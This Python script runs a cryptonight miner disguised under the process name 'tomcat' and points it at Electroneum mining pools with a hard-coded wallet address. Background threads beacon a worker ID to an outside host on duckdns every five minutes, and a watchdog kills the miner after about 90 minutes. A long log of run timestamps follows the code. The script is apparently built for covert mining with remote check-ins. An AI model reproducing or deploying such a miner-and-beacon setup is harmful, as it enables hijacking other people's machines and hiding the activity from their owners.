import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:03:04.323248
#2018-02-17 16:49:07.651804
#2018-02-17 18:38:07.335029
#2018-02-17 20:27:06.493566
#2018-02-17 22:14:07.214747
#2018-02-17 23:58:01.419286
#2018-02-18 01:49:05.009372
#2018-02-18 03:38:01.808402
#2018-02-18 05:24:03.979452
#2018-02-18 07:16:05.399968
#2018-02-18 09:03:04.768644
#2018-02-18 10:50:07.642285
#2018-02-18 12:38:03.860306
#2018-02-18 14:24:01.756803
#2018-02-18 16:15:06.861064
#2018-02-18 18:04:07.142101
#2018-02-18 19:51:03.472681
#2018-02-18 21:39:05.024030
#2018-02-18 23:27:05.007729
#2018-02-19 01:14:05.676504
#2018-02-19 03:01:07.779010
#2018-02-19 04:48:06.759572
#2018-02-19 06:34:01.620757
#2018-02-19 08:22:07.622345
#2018-02-19 10:12:01.581189
#2018-02-19 12:00:01.479230
#2018-02-19 13:47:06.910114
#2018-02-19 15:38:01.763860
#2018-02-19 17:26:04.416991
#2018-02-19 19:14:01.585995
#2018-02-19 21:03:05.914668
#2018-02-19 22:50:07.778967
#2018-02-20 00:35:07.543422
#2018-02-20 02:24:07.078673
#2018-02-20 04:14:07.305369
#2018-02-20 05:57:03.567831
#2018-02-20 07:43:04.412651
#2018-02-20 09:27:07.302891
#2018-02-20 11:11:02.123738
#2018-02-20 12:58:05.331542
#2018-02-20 14:44:11.342922
#2018-02-20 16:33:07.714168
#2018-02-20 18:20:12.154412
#2018-02-20 20:12:04.907193
#2018-02-20 21:59:06.924707
#2018-02-20 23:40:07.252754
#2018-02-21 01:24:06.628869
#2018-02-21 03:12:06.796529
#2018-02-21 05:01:07.032328
#2018-02-21 06:49:04.820301
#2018-02-21 08:34:01.598794
#2018-02-21 10:19:07.105396
#2018-02-21 12:07:01.979151
#2018-02-21 13:55:09.163304
#2018-02-21 15:42:06.661370
#2018-02-21 17:36:05.828846
#2018-02-21 19:22:01.896294
#2018-02-21 21:10:03.985560
#2018-02-21 22:58:07.891900
#2018-02-22 00:48:07.230273
#2018-02-22 02:36:08.177183
#2018-02-22 04:21:07.075334
#2018-02-22 06:07:04.603588
#2018-02-22 07:53:06.978833
#2018-02-22 09:41:08.217511
#2018-02-22 11:26:10.787735
#2018-02-22 13:12:05.588564
#2018-02-22 15:03:10.641192
#2018-02-22 16:46:08.238232
#2018-02-22 18:36:06.978284
#2018-02-22 20:27:01.474222
#2018-02-22 22:13:05.843643
#2018-02-23 00:00:11.827523
#2018-02-23 01:47:06.585757
#2018-02-23 03:37:07.438299
#2018-02-23 05:23:06.409271
#2018-02-23 07:09:03.666240
#2018-02-23 08:58:06.351320
#2018-02-23 11:15:10.045948
#2018-02-23 13:09:04.277939
#2018-02-23 14:55:07.471887
#2018-02-23 16:44:05.621852
#2018-02-23 18:31:08.230487
#2018-02-23 20:19:04.548655
#2018-02-23 22:07:07.148566
#2018-02-23 23:55:03.989344
#2018-02-24 01:45:05.203875
#2018-02-24 03:37:07.077437
#2018-02-24 05:21:05.260177
#2018-02-24 07:09:06.236260
#2018-02-24 08:58:02.057554
#2018-02-24 10:38:06.109209
#2018-02-24 12:24:01.641163
#2018-02-24 14:16:06.672396
#2018-02-24 16:02:05.375257
#2018-02-24 17:54:01.897153
#2018-02-24 19:41:05.133410
#2018-02-24 21:28:06.420988
#2018-02-25 00:12:07.733391
#2018-02-25 04:17:03.627017
#2018-02-25 07:47:03.496579